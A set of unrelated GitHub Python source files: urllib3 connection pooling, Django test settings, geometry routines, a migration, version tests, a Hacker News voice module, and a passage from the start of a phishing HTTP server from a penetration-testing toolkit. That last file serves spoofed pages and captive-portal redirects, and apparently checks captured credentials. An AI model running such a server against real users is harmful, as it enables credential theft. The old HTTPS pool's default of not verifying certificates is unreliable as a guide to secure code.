(self.num_connections, self.host))
return HTTPConnection(host=self.host, port=self.port)
def _get_conn(self, timeout=None):
"""
Get a connection. Will return a pooled connection if one is available.
If no connections are available and :prop:`.block` is ``False``, then a
fresh connection is returned.
:param timeout:
Seconds to wait before giving up and raising
:class:`urllib3.exceptions.EmptyPoolError` if the pool is empty and
:prop:`.block` is ``True``.
"""
conn = None
try:
conn = self.pool.get(block=self.block, timeout=timeout)
# If this is a persistent connection, check if it got disconnected
if conn and conn.sock and select([conn.sock], [], [], 0.0)[0]:
# Either data is buffered (bad), or the connection is dropped.
log.info("Resetting dropped connection: %s" % self.host)
conn.close()
except Empty:
if self.block:
raise EmptyPoolError("Pool reached maximum size and no more "
"connections are allowed.")
pass # Oh well, we'll create a new connection then
return conn or self._new_conn()
def _put_conn(self, conn):
"""
Put a connection back into the pool.
:param conn:
Connection object for the current host and port as returned by
:meth:`._new_conn` or :meth:`._get_conn`.
If the pool is already full, the connection is discarded because we
exceeded maxsize. If connections are discarded frequently, then maxsize
should be increased.
"""
try:
self.pool.put(conn, block=False)
except Full:
# This should never happen if self.block == True
log.warning("HttpConnectionPool is full, discarding connection: %s"
% self.host)
def _make_request(self, conn, method, url, timeout=_Default,
**httplib_request_kw):
"""
Perform a request on a given httplib connection object taken from our
pool.
"""
self.num_requests += 1
if timeout is _Default:
timeout = self.timeout
conn.timeout = timeout # This only does anything in Py26+
conn.request(method, url, **httplib_request_kw)
conn.sock.settimeout(timeout)
httplib_response = conn.getresponse()
log.debug("\"%s %s %s\" %s %s" %
(method, url,
conn._http_vsn_str, # pylint: disable-msg=W0212
httplib_response.status, httplib_response.length))
return httplib_response
def is_same_host(self, url):
"""
Check if the given ``url`` is a member of the same host as this
        connection pool.
"""
# TODO: Add optional support for socket.gethostbyname checking.
return (url.startswith('/') or
get_host(url) == (self.scheme, self.host, self.port))
def urlopen(self, method, url, body=None, headers=None, retries=3,
redirect=True, assert_same_host=True, timeout=_Default,
pool_timeout=None, release_conn=None, **response_kw):
"""
Get a connection from the pool and perform an HTTP request. This is the
lowest level call for making a request, so you'll need to specify all
the raw details.
.. note::
More commonly, it's appropriate to use a convenience method provided
by :class:`.RequestMethods`, such as :meth:`.request`.
.. note::
`release_conn` will only behave as expected if
`preload_content=False` because we want to make
`preload_content=False` the default behaviour someday soon without
breaking backwards compatibility.
:param method:
HTTP request method (such as GET, POST, PUT, etc.)
:param body:
Data to send in the request body (useful for creating
POST requests, see HTTPConnectionPool.post_url for
more convenience).
:param headers:
Dictionary of custom headers to send, such as User-Agent,
If-None-Match, etc. If None, pool headers are used. If provided,
these headers completely replace any pool-specific headers.
:param retries:
Number of retries to allow before raising a MaxRetryError exception.
:param redirect:
Automatically handle redirects (status codes 301, 302, 303, 307),
each redirect counts as a retry.
:param assert_same_host:
If ``True``, will make sure that the host of the pool requests is
consistent else will raise HostChangedError. When False, you can
use the pool on an HTTP proxy and request foreign hosts.
:param timeout:
If specified, overrides the default timeout for this one request.
:param pool_timeout:
If set and the pool is set to block=True, then this method will
block for ``pool_timeout`` seconds and raise EmptyPoolError if no
connection is available within the time period.
:param release_conn:
If False, then the urlopen call will not release the connection
back into the pool once a response is received (but will release if
you read the entire contents of the response such as when
`preload_content=True`). This is useful if you're not preloading
the response's content immediately. You will need to call
``r.release_conn()`` on the response ``r`` to return the connection
back into the pool. If None, it takes the value of
``response_kw.get('preload_content', True)``.
:param \**response_kw:
Additional parameters are passed to
:meth:`urllib3.response.HTTPResponse.from_httplib`
"""
if headers is None:
headers = self.headers
if retries < 0:
raise MaxRetryError("Max retries exceeded for url: %s" % url)
if timeout is _Default:
timeout = self.timeout
if release_conn is None:
release_conn = response_kw.get('preload_content', True)
# Check host
if assert_same_host and not self.is_same_host(url):
host = "%s://%s" % (self.scheme, self.host)
if self.port:
host = "%s:%d" % (host, self.port)
raise HostChangedError("Connection pool with host '%s' tried to "
"open a foreign host: %s" % (host, url))
conn = None
try:
# Request a connection from the queue
# (Could raise SocketError: Bad file descriptor)
conn = self._get_conn(timeout=pool_timeout)
# Make the request on the httplib connection object
httplib_response = self._make_request(conn, method, url,
timeout=timeout,
body=body, headers=headers)
# If we're going to release the connection in ``finally:``, then
# the request doesn't need to know about the connection. Otherwise
# it will also try to release it and we'll have a double-release
# mess.
response_conn = not release_conn and conn
# Import httplib's response into our own wrapper object
response = HTTPResponse.from_httplib(httplib_response,
pool=self,
connection=response_conn,
**response_kw)
# else:
# The connection will be put back into the pool when
# ``response.release_conn()`` is called (implicitly by
# ``response.read()``)
except (Empty), e:
# Timed out by queue
raise TimeoutError("Request timed out. (pool_timeout=%s)" %
pool_timeout)
except (SocketTimeout), e:
# Timed out by socket
raise TimeoutError("Request timed out. (timeout=%s)" %
timeout)
except (BaseSSLError), e:
# SSL certificate error
raise SSLError(e)
except (CertificateError), e:
# Name mismatch
raise SSLError(e)
except (HTTPException, SocketError), e:
# Connection broken, discard. It will be replaced next _get_conn().
conn = None
finally:
if conn and release_conn:
# Put the connection back to be reused
self._put_conn(conn)
if not conn:
log.warn("Retrying (%d attempts remain) after connection "
"broken by '%r': %s" % (retries, e, url))
return self.urlopen(method, url, body, headers, retries - 1,
redirect, assert_same_host) # Try again
# Handle redirection
if (redirect and
response.status in [301, 302, 303, 307] and
'location' in response.headers): # Redirect, retry
log.info("Redirecting %s -> %s" %
(url, response.headers.get('location')))
return self.urlopen(method, response.headers.get('location'), body,
headers, retries - 1, redirect,
assert_same_host)
return response
class HTTPSConnectionPool(HTTPConnectionPool):
"""
Same as :class:`.HTTPConnectionPool`, but HTTPS.
When Python is compiled with the :mod:`ssl` module, then
:class:`.VerifiedHTTPSConnection` is used, which *can* verify certificates,
    instead of :class:`httplib.HTTPSConnection`.
The ``key_file``, ``cert_file``, ``cert_reqs``, and ``ca_certs`` parameters
are only used if :mod:`ssl` is available and are fed into
:meth:`ssl.wrap_socket` to upgrade the connection socket into an SSL socket.
"""
scheme = 'https'
def __init__(self, host, port=None,
strict=False, timeout=None, maxsize=1,
block=False, headers=None,
key_file=None, cert_file=None,
cert_reqs='CERT_NONE', ca_certs=None):
super(HTTPSConnectionPool, self).__init__(host, port,
strict, timeout, maxsize,
block, headers)
self.key_file = key_file
self.cert_file = cert_file
self.cert_reqs = cert_reqs
self.ca_certs = ca_certs
def _new_conn(self):
"""
Return a fresh :class:`httplib.HTTPSConnection`.
"""
self.num_connections += 1
log.info("Starting new HTTPS connection (%d): %s"
% (self.num_connections, self.host))
if not ssl:
return HTTPSConnection(host=self.host, port=self.port)
connection = VerifiedHTTPSConnection(host=self.host, port=self.port)
connection.set_cert(key_file=self.key_file, cert_file=self.cert_file,
cert_reqs=self.cert_reqs, ca_certs=self.ca_certs)
return connection
## Helpers
def make_headers(keep_alive=None, accept_encoding=None, user_agent=None,
basic_auth=None):
"""
Shortcuts for generating request headers.
:param keep_alive:
If ``True``, adds 'connection: keep-alive' header.
:param accept_encoding:
Can be a boolean, list, or string.
``True`` translates to 'gzip,deflate'.
List will get joined by comma.
String will be used as provided.
:param user_agent:
String representing the user-agent you want, such as
"python-urllib3/0.6"
:param basic_auth:
Colon-separated username:password string for 'authorization: basic ...'
auth header.
Example: ::
>>> make_headers(keep_alive=True, user_agent="Batman/1.0")
{'connection': 'keep-alive', 'user-agent': 'Batman/1.0'}
>>> make_headers(accept_encoding=True)
{'accept-encoding': 'gzip,deflate'}
"""
headers = {}
if accept_encoding:
if isinstance(accept_encoding, str):
pass
elif isinstance(accept_encoding, list):
accept_encoding = ','.join(accept_encoding)
else:
accept_encoding = 'gzip,deflate'
headers['accept-encoding'] = accept_encoding
if user_agent:
headers['user-agent'] = user_agent
if keep_alive:
headers['connection'] = 'keep-alive'
if basic_auth:
headers['authorization'] = 'Basic ' + \
basic_auth.encode('base64').strip()
return headers
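# Illustrative example (not exhaustive): basic_auth is assumed to be a plain
# 'user:pass' string, which gets base64-encoded into the authorization header.
#   >>> make_headers(basic_auth='user:pass')['authorization']
#   'Basic dXNlcjpwYXNz'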
def get_host(url):
"""
Given a url, return its scheme, host and port (None if it's not there).
For example: ::
>>> get_host('http://google.com/mail/')
('http', 'google.com', None)
>>> get_host('google.com:80')
('http', 'google.com', 80)
"""
# This code is actually similar to urlparse.urlsplit, but much
# simplified for our needs.
port = None
scheme = 'http'
if '://' in url:
scheme, url = url.split('://', 1)
if '/' in url:
url, _path = url.split('/', 1)
if '@' in url:
_auth, url = url.split('@', 1)
if ':' in url:
url, port = url.split(':', 1)
port = int(port)
return scheme, url, port
def connection_from_url(url, **kw):
"""
Given a url, return an :class:`.ConnectionPool` instance of its host.
This is a shortcut for not having to parse out the scheme, host, and port
of the url before creating an :class:`.ConnectionPool` instance.
:param url:
Absolute URL string that must include the scheme. Port is optional.
:param \**kw:
Passes additional parameters to the constructor of the appropriate
:class:`.ConnectionPool`. Useful for specifying things like
timeout, maxsize, headers, etc.
Example: ::
>>> conn = connection_from_url('http://google.com/')
>>> r = conn.request('GET', '/')
"""
scheme, host, port = get_host(url)
if scheme == 'https':
return HTTPSConnectionPool(host, port=port, **kw)
else:
return HTTPConnectionPool(host, port=port, **kw)
|
{
"content_hash": "24b43886045b43e8d1da0f19bf617a27",
"timestamp": "",
"source": "github",
"line_count": 546,
"max_line_length": 80,
"avg_line_length": 34.88278388278388,
"alnum_prop": 0.5833770870523994,
"repo_name": "clofresh/xbmc-vhx",
"id": "c1ebed495299c31ab2e70d782d39127c04305809",
"size": "19278",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "resources/lib/requests/packages/urllib3/connectionpool.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "165555"
}
],
"symlink_target": ""
}
|
"""Settings that need to be set in order to run the tests."""
import os
DEBUG = True
SITE_ID = 1
APP_ROOT = os.path.abspath(
os.path.join(os.path.dirname(__file__), '..'))
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': ':memory:',
}
}
ROOT_URLCONF = 'booking.tests.urls'
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(APP_ROOT, '../app_static')
MEDIA_ROOT = os.path.join(APP_ROOT, '../app_media')
STATICFILES_DIRS = (
os.path.join(APP_ROOT, 'static'),
)
TEMPLATES = [{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'APP_DIRS': True,
'DIRS': [os.path.join(APP_ROOT, 'tests/test_app/templates')],
'OPTIONS': {
'context_processors': (
'django.contrib.auth.context_processors.auth',
'django.template.context_processors.request',
)
}
}]
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
)
EXTERNAL_APPS = [
'django.contrib.admin',
'django.contrib.admindocs',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.messages',
'django.contrib.sessions',
'django.contrib.staticfiles',
'django.contrib.sitemaps',
'django.contrib.sites',
]
INTERNAL_APPS = [
'booking',
'booking.tests.test_app',
]
INSTALLED_APPS = EXTERNAL_APPS + INTERNAL_APPS
SECRET_KEY = 'foobar'
|
{
"content_hash": "4a927a7cee1fedba1edd30da3604acb5",
"timestamp": "",
"source": "github",
"line_count": 65,
"max_line_length": 65,
"avg_line_length": 23.446153846153845,
"alnum_prop": 0.6456692913385826,
"repo_name": "bitmazk/django-booking",
"id": "c76f699a9ea94f2a595ab519b9fa849c5551b149",
"size": "1524",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "booking/tests/test_settings.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "140146"
}
],
"symlink_target": ""
}
|
import numpy as np
import random
rng = random.SystemRandom()
from cmath import rect
from collections import deque
def point_aabb(points):
"""Returns the axis-aligned bounding box of the input set of points as (SW corner, NE corner) (lowest and highest parts respectively)."""
preal, pimag = np.real(points), np.imag(points)
return complex(min(preal), min(pimag)), complex(max(preal), max(pimag))
def bridson(w, h):
"""Generates random points in [0, w) × [0, h) separated by at least 1 using Bridson's algorithm."""
# http://www.cs.ubc.ca/~rbridson/docs/bridson-siggraph07-poissondisk.pdf
mesh = 0.70710678118654757
offsets = [(1, 0), (0, 1), (-1, 0), (0, -1), (1, 1), (-1, 1), (-1, -1), (1, -1), (2, 0),
(0, 2), (-2, 0), (0, -2), (2, 1), (1, 2), (-1, 2), (-2, 1), (-2, -1), (-1, -2), (1, -2), (2, -1)]
grid = np.full((int(h / mesh) + 5, int(w / mesh) + 5), -1-1j)
start_y, start_x = h * rng.random(), w * rng.random(); start = complex(start_x, start_y)
grid[int(start_y / mesh) + 2,int(start_x / mesh) + 2] = start; active = [start]; yield start
while active:
pivot, dead = rng.choice(active), True
for q in range(32):
tooclose = False
cand = pivot + rect(np.sqrt(rng.uniform(1, 4)), 2 * np.pi * rng.random())
if not (0 <= cand.real < w and 0 <= cand.imag < h): continue
cand_y, cand_x = int(cand.imag / mesh) + 2, int(cand.real / mesh) + 2
if grid[cand_y,cand_x] != -1-1j: continue
for offset_x, offset_y in offsets:
contrapoint = grid[cand_y + offset_y,cand_x + offset_x]
if contrapoint != -1-1j and abs(cand - contrapoint) < 1: tooclose = True; break
if tooclose: continue
grid[cand_y,cand_x] = cand; active.append(cand); yield cand; dead = False; break
if dead: active.remove(pivot)
return
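# Usage sketch (illustrative dimensions): bridson() is a generator, so the
# sample is materialised with list(); any two returned points are >= 1 apart.
#   samples = list(bridson(20, 10))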
def chull(points):
"""Computes the convex hull of the given distinct points using Graham's scan. Returns the hull's points' indices.
Points lying exactly on the line between two hull points are excluded."""
if len(points) < 3: return points
start = np.argmin(points) # NumPy sorts complex numbers by real and then imaginary parts; first, leftmost point is automatically on the hull
out = [start]
queue = sorted(range(len(points)), key=lambda n: -2 if n == start else (points[n] - points[start]).imag / abs(points[n] - points[start]))
out.append(queue[1])
for n in queue[2:]:
pn = points[n]
while len(out) > 1:
p1, p2 = points[out[-2]], points[out[-1]]
v, w = p2 - p1, pn - p2
if v.real * w.imag <= v.imag * w.real: out.pop()
else: break
out.append(n)
return out
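# Usage sketch (hand-checked example): the centre point lies strictly inside
# the square, so only the four corner indices are expected in the hull.
#   hull = chull([0+0j, 1+0j, 1+1j, 0+1j, 0.5+0.5j])   # expected: [0, 1, 2, 3]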
def wolfe1(alpha, f0, f0_, fa, c = 1e-4):
"""Tests for the first Wolfe or Armijo condition: ϕ(α) ≤ ϕ(0) + cαϕ'(0)."""
return fa <= f0 + c * alpha * f0_
def wolfe2(f0_, fa_, c = 0.9):
"""Tests for the strong second Wolfe or curvature condition: |ϕ'(α)| ≤ c|ϕ'(α)|."""
return abs(fa_) <= c * abs(f0_)
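# Worked example (illustrative numbers): for ϕ(0) = 10, ϕ'(0) = -2 and a trial
# step α = 1 with ϕ(1) = 9.9, ϕ'(1) = -0.5:
#   wolfe1(1, 10, -2, 9.9)   # 9.9 <= 10 + 1e-4*1*(-2)  -> True
#   wolfe2(-2, -0.5)         # |-0.5| <= 0.9*|-2|        -> True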
def geommedian_distinct(points, w):
"""Geometric median of input distinct points (represented as a 2D ndarray), which may be of arbitrary dimension.
w is an ndarray of corresponding positive weights. Uses Newton's method with Fletcher's line search
(Algorithms 3.5 and 3.6 in Nocedal & Wright's Numerical Optimization, 2nd edition)."""
N, d = points.shape
# Check if any input point is itself the median. This happens to handle collinear cases too, where the median may not be unique.
for i in range(N):
vecs = points - points[i]
vecls = np.linalg.norm(vecs, axis=1)
vecls[i] = 1
r = np.linalg.norm(w / vecls @ vecs)
if r <= w[i]: return points[i]
def fjh(x): # Returns the function value, Jacobian and Hessian at once
vecs = x - points
vecls = np.linalg.norm(vecs, axis=1)
f = w @ vecls
k = vecs.T / vecls
j = (k * w).sum(axis=1)
l = np.apply_along_axis(lambda v: np.eye(d) - np.outer(v, v), 0, k)
h = (l * w / vecls).sum(axis=2)
return (f, j, h)
x = w @ points / w.sum()
for q in range(32):
fx, jx, hx = fjh(x)
delta = np.linalg.solve(hx, -jx)
def phi(alpha): # ϕ(α) for line search; caches data to avoid recomputation
xa = x + alpha * delta
fa, ja, ha = fjh(xa)
return (alpha, fa, ja @ delta, (xa, fa, ja, ha))
aq = deque([(0, fx, jx @ delta, (x, fx, jx, hx))], 2)
f0_ = aq[0][2] # ϕ'(0)
alpha, accepted, zoom_lo, zoom_hi = 1, None, None, None
for r in range(3): # Main line search (3.5, p. 60)
aq.append(phi(alpha))
if not wolfe1(alpha, fx, f0_, aq[1][1]) or r and aq[1][1] >= aq[0][1]: zoom_lo, zoom_hi = aq[0], aq[1]; break
if wolfe2(f0_, aq[1][2]): accepted = aq[1]; break
if aq[1][2] >= 0: zoom_lo, zoom_hi = aq[1], aq[0]; break
alpha *= 2
if not accepted and zoom_lo: # Zoom procedure (3.6, p. 61)
if abs(f0_) <= 1e-12: return x # Guard against plateaus that form as a result of finite-precision arithmetic
for r in range(10):
alpha = (zoom_lo[0] + zoom_hi[0]) / 2
zoom_mi = phi(alpha)
if not wolfe1(alpha, fx, f0_, zoom_mi[1]) or zoom_mi[1] >= zoom_lo[1]: zoom_hi = zoom_mi
else:
if wolfe2(f0_, zoom_mi[2]): accepted = zoom_mi; break
if zoom_mi[2] * (zoom_hi[0] - zoom_lo[0]) >= 0: zoom_hi = zoom_lo
zoom_lo = zoom_mi
if accepted:
x, fx, jx, hx = accepted[3]
if np.max(np.abs(jx)) <= 1e-12: break
else: break
return x
def geommedian(points, weights = None):
"""Geometric median of input points. Ensures simplicity of the point set passed to geommedian_distinct
by combining coincident points into a single point of higher weight; also ignores non-positive-weighted points."""
p, w = [], []
for i in range(len(points)):
cp, cw = points[i], 1 if weights is None else weights[i]
if cw <= 0: continue
if not p: p.append(cp); w.append(cw)
else:
dists = [np.linalg.norm(q - cp) for q in p]
c = np.argmin(dists)
if dists[c] <= 1e-10 * np.linalg.norm(cp): w[c] += cw
else: p.append(cp); w.append(cw)
return geommedian_distinct(np.array(p), np.array(w))
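# Usage sketch (illustrative): with unit weights, the geometric median of the
# four corners of the unit square is (approximately) its centre, [0.5, 0.5].
#   centre = geommedian(np.array([[0., 0.], [1., 0.], [0., 1.], [1., 1.]]))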
|
{
"content_hash": "7c5fc28b45ddd5debb3f0795e6696afc",
"timestamp": "",
"source": "github",
"line_count": 129,
"max_line_length": 144,
"avg_line_length": 50.666666666666664,
"alnum_prop": 0.5651774785801713,
"repo_name": "Parclytaxel/Kinross",
"id": "9b4d5e6f9113fe3ed23ac127a13c8c3815894a0c",
"size": "6647",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "kinback/pointset.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "94297"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('hypnobox', '0002_auto_20160909_1835'),
]
operations = [
migrations.AlterField(
model_name='lead',
name='product_id',
field=models.CharField(blank=True, max_length=100, verbose_name='product id'),
),
]
|
{
"content_hash": "6f9f4ad99a57bd6640d46514560a656f",
"timestamp": "",
"source": "github",
"line_count": 18,
"max_line_length": 90,
"avg_line_length": 23.38888888888889,
"alnum_prop": 0.6057007125890737,
"repo_name": "fgmacedo/hypnobox-django",
"id": "6d87043a813dd1ae9e7eb2e5fab82a2d969f0b52",
"size": "493",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "hypnobox/migrations/0003_auto_20160913_1040.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "987"
},
{
"name": "Makefile",
"bytes": "1569"
},
{
"name": "Python",
"bytes": "12655"
}
],
"symlink_target": ""
}
|
"""Tests around project's distribution and packaging."""
import os
import unittest
tests_dir = os.path.dirname(os.path.abspath(__file__))
project_dir = os.path.dirname(tests_dir)
class VersionTestCase(unittest.TestCase):
"""Various checks around project's version info."""
def get_project_name(self):
"""Return project name."""
return 'django-plainpasswordhasher'
def get_package_name(self):
"""Return package name."""
return self.get_project_name().replace('-', '_')
def get_version(self, package):
"""Return project's version defined in package."""
module = __import__(package, globals(), locals(), [], -1)
return module.__version__
def test_version_present(self):
""":PEP:`396` - Project's package has __version__ attribute."""
package_name = self.get_package_name()
try:
self.get_version(package_name)
except ImportError:
self.fail("{package}'s package has no __version__.".format(
package=package_name))
def test_version_match(self):
"""Package's __version__ matches pkg_resources info."""
project_name = self.get_project_name()
package_name = self.get_package_name()
try:
import pkg_resources
except ImportError:
self.fail('Cannot import pkg_resources module. It is part of '
'setuptools, which is a dependency of '
'{project}.'.format(project=project_name))
distribution = pkg_resources.get_distribution(project_name)
installed_version = self.get_version(package_name)
registered_version = distribution.version
self.assertEqual(registered_version, installed_version,
'Version mismatch: {package}.__version__ '
'is "{installed}" whereas pkg_resources tells '
'"{registered}". You may need to run ``make '
'develop`` to update the installed version in '
'development environment.'.format(
package=package_name,
installed=installed_version,
registered=registered_version))
def test_version_file(self):
"""Project's __version__ matches VERSION file info."""
package_name = self.get_package_name()
version_file = os.path.join(project_dir, 'VERSION')
installed_version = self.get_version(package_name)
file_version = open(version_file).read().strip()
self.assertEqual(file_version, installed_version,
'Version mismatch: {package}.__version__ '
'is "{installed}" whereas VERSION file tells '
'"{declared}". You may need to run ``make develop`` '
'to update the installed version in development '
'environment.'.format(
package=package_name,
installed=installed_version,
declared=file_version))
|
{
"content_hash": "57df7b373443ef71af778ac824468a2b",
"timestamp": "",
"source": "github",
"line_count": 71,
"max_line_length": 78,
"avg_line_length": 44.66197183098591,
"alnum_prop": 0.5629139072847682,
"repo_name": "novapost/django-plainpasswordhasher",
"id": "acbf2b88cfc00d496f735da45c1e4d76cf878c66",
"size": "3195",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tests/version.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "14350"
}
],
"symlink_target": ""
}
|
import urllib2
import re
import random
from bs4 import BeautifulSoup
from client import app_utils
from semantic.numbers import NumberService
WORDS = ["HACKER", "NEWS", "YES", "NO", "FIRST", "SECOND", "THIRD"]
PRIORITY = 4
URL = 'http://news.ycombinator.com'
class HNStory:
def __init__(self, title, URL):
self.title = title
self.URL = URL
def getTopStories(maxResults=None):
"""
Returns the top headlines from Hacker News.
Arguments:
maxResults -- if provided, returns a random sample of size maxResults
"""
hdr = {'User-Agent': 'Mozilla/5.0'}
req = urllib2.Request(URL, headers=hdr)
page = urllib2.urlopen(req).read()
soup = BeautifulSoup(page)
matches = soup.findAll('td', class_="title")
matches = [m.a for m in matches if m.a and m.text != u'More']
matches = [HNStory(m.text, m['href']) for m in matches]
if maxResults:
num_stories = min(maxResults, len(matches))
return random.sample(matches, num_stories)
return matches
def handle(text, mic, profile):
"""
Responds to user-input, typically speech text, with a sample of
Hacker News's top headlines, sending them to the user over email
if desired.
Arguments:
text -- user-input, typically transcribed speech
mic -- used to interact with the user (for both input and output)
profile -- contains information related to the user (e.g., phone
number)
"""
mic.say('A', "Pulling up some stories.")
stories = getTopStories(maxResults=3)
all_titles = '... '.join(str(idx + 1) + ") " +
story.title for idx, story in enumerate(stories))
def handleResponse(text):
def extractOrdinals(text):
output = []
service = NumberService()
for w in text.split():
if w in service.__ordinals__:
output.append(service.__ordinals__[w])
return [service.parse(w) for w in output]
chosen_articles = extractOrdinals(text)
send_all = not chosen_articles and app_utils.isPositive(text)
if send_all or chosen_articles:
mic.say('A', "Sure, just give me a moment")
if profile['prefers_email']:
body = "<ul>"
def formatArticle(article):
tiny_url = app_utils.generateTinyURL(article.URL)
if profile['prefers_email']:
return "<li><a href=\'%s\'>%s</a></li>" % (tiny_url,
article.title)
else:
return article.title + " -- " + tiny_url
for idx, article in enumerate(stories):
if send_all or (idx + 1) in chosen_articles:
article_link = formatArticle(article)
if profile['prefers_email']:
body += article_link
else:
if not app_utils.emailUser(profile, SUBJECT="",
BODY=article_link):
mic.say('A', "I'm having trouble sending you " +
"these articles. Please make sure that " +
"your phone number and carrier are " +
"correct on the dashboard.")
return
# if prefers email, we send once, at the end
if profile['prefers_email']:
body += "</ul>"
if not app_utils.emailUser(profile,
SUBJECT="From the Front Page of " +
"Hacker News",
BODY=body):
mic.say('A', "I'm having trouble sending you these " +
"articles. Please make sure that your " +
"phone number and carrier are correct " +
"on the dashboard.")
return
mic.say('A', "All done.")
else:
mic.say('A', "OK I will not send any articles")
if not profile['prefers_email'] and profile['phone_number']:
mic.say('I', "Here are some front-page articles. " +
all_titles + ". Would you like me to send you these? " +
"If so, which?")
handleResponse(mic.activeListen())
else:
mic.say('A', "Here are some front-page articles. " + all_titles)
def isValid(text):
"""
Returns True if the input is related to Hacker News.
Arguments:
text -- user-input, typically transcribed speech
"""
return bool(re.search(r'\b(hack(er)?|HN)\b', text, re.IGNORECASE))
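# Usage sketch (illustrative phrases): isValid() only inspects the transcribed
# text, so it can be exercised without a mic or profile.
#   isValid("what's on hacker news today")   # True
#   isValid("read me the weather")           # False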
|
{
"content_hash": "be924e4cd5132409cad7c87bba4dd40c",
"timestamp": "",
"source": "github",
"line_count": 139,
"max_line_length": 78,
"avg_line_length": 35.1294964028777,
"alnum_prop": 0.5130043006348556,
"repo_name": "brad999/nikita-client",
"id": "d62ff56fa848afe7c781728bc457aa20bd3c9ad0",
"size": "4906",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "client/modules/HN.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "210692"
},
{
"name": "Shell",
"bytes": "310"
}
],
"symlink_target": ""
}
|
"""
phishing.py: Phishing HTTP server (phishing)
Author: Vladimir Ivanov
License: MIT
Copyright 2020, Raw-packet Project
"""
# endregion
# region Import
from raw_packet.Utils.base import Base
from http.server import BaseHTTPRequestHandler, HTTPServer
from socketserver import ThreadingMixIn
from typing import List, Dict, Tuple, Callable, Union
from json import loads, decoder
from user_agents import parse as user_agent_parse
from os.path import abspath, dirname, isdir, isfile, join
from os import listdir
from socket import AF_INET6
# endregion
# region Authorship information
__author__ = 'Vladimir Ivanov'
__copyright__ = 'Copyright 2020, Raw-packet Project'
__credits__ = ['']
__license__ = 'MIT'
__version__ = '0.2.1'
__maintainer__ = 'Vladimir Ivanov'
__email__ = 'ivanov.vladimir.mail@gmail.com'
__status__ = 'Development'
__script_name__ = 'Make phishing HTTP pages (phishing)'
# endregion
# region Phishing HTTP Request Handler
class _PhishingHTTPRequestHandler(BaseHTTPRequestHandler):
BaseHTTPRequestHandler.server_version = 'nginx'
BaseHTTPRequestHandler.sys_version = ''
# BaseHTTPRequestHandler.protocol_version = 'HTTP/1.1'
# BaseHTTPRequestHandler.close_connection = True
# region Errors
def error_SendResponse(self, error_code: int):
full_path: str = join(self.server.site_path + self.server.separator + 'errors' +
self.server.separator + str(error_code) + '.html')
if isfile(full_path):
response: bytes = open(full_path, 'rb').read()
else:
response: bytes = bytes('<html>ERROR</html>', encoding='utf-8')
self.send_response(error_code)
self.send_header('Content-Type', 'text/html; charset=UTF-8')
self.send_header('Content-Length', str(len(response)))
self.send_header('Connection', 'close')
self.end_headers()
self.wfile.write(response)
def error_BadRequest(self):
self.error_SendResponse(error_code=400)
def error_FileNotFound(self):
self.error_SendResponse(error_code=404)
    def error_NeedContentLength(self):
self.error_SendResponse(error_code=411)
def error_CheckCreds(self):
response: bytes = bytes('ERROR', 'utf-8')
self.send_response(200)
self.send_header('Content-Type', 'text/plain; charset=UTF-8')
self.send_header('Content-Length', str(len(response)))
self.send_header('Connection', 'close')
self.end_headers()
self.wfile.write(response)
def redirect(self):
response: bytes = bytes('<HTML><HEAD><TITLE> Web Authentication Redirect</TITLE>'
'<META http-equiv="Cache-control" content="no-cache">'
'<META http-equiv="Pragma" content="no-cache">'
'<META http-equiv="Expires" content="-1">'
'<META http-equiv="refresh" content="1; URL=http://' + self.server.site_domain +
'/"></HEAD></HTML>', 'utf-8')
self.send_response(302)
self.send_header('Location', 'http://' + self.server.site_domain + '/')
self.send_header('Content-Type', 'text/html; charset=UTF-8')
self.send_header('Content-Length', str(len(response)))
self.send_header('Connection', 'close')
self.end_headers()
self.wfile.write(response)
# endregion
# region Parse User-agent header
@staticmethod
def parse_user_agent(user_agent: Union[None, str]) -> Dict[str, str]:
result: Dict[str, str] = {
'os': 'Other',
'browser': 'Other'
}
if user_agent is None:
raise AttributeError('User-Agent header not found!')
if 'CaptiveNetworkSupport' in user_agent and 'wispr' in user_agent:
result['os']: str = 'Mac OS X'
result['browser']: str = 'Captive'
else:
device = user_agent_parse(user_agent_string=user_agent)
result['os']: str = device.os.family
result['browser']: str = device.browser.family
return result
# endregion
# region Check Host header
def check_host(self, host: Union[None, str]) -> None:
if host is None:
raise AttributeError('Host header not found!')
if self.headers['Host'] != self.server.site_domain:
raise NameError
# endregion
    # region Get full path to file
def _get_full_path(self, path: str = '/') -> str:
if self.server.separator == '\\':
path: str = path.replace('/', '\\')
if path == self.server.separator:
full_path: str = join(self.server.site_path + self.server.separator + 'index.html')
else:
full_path: str = join(self.server.site_path + self.path)
return full_path
# endregion
# region Get content type by file extension
def _get_content_type(self, path: str = '/index.html') -> str:
content_type: str = 'text/plain'
if path.endswith('.html'):
content_type = 'text/html'
elif path.endswith('.ico'):
content_type = 'image/x-icon'
elif path.endswith('.js'):
content_type = 'text/javascript'
elif path.endswith('.css'):
content_type = 'text/css'
elif path.endswith('.ttf'):
content_type = 'font/ttf'
elif path.endswith('.woff'):
content_type = 'font/woff'
elif path.endswith('.woff2'):
content_type = 'font/woff2'
elif path.endswith('.eot'):
content_type = 'application/vnd.ms-fontobject'
elif path.endswith('.gif'):
content_type = 'image/gif'
elif path.endswith('.png'):
content_type = 'image/png'
elif path.endswith('.svg'):
content_type = 'image/svg+xml'
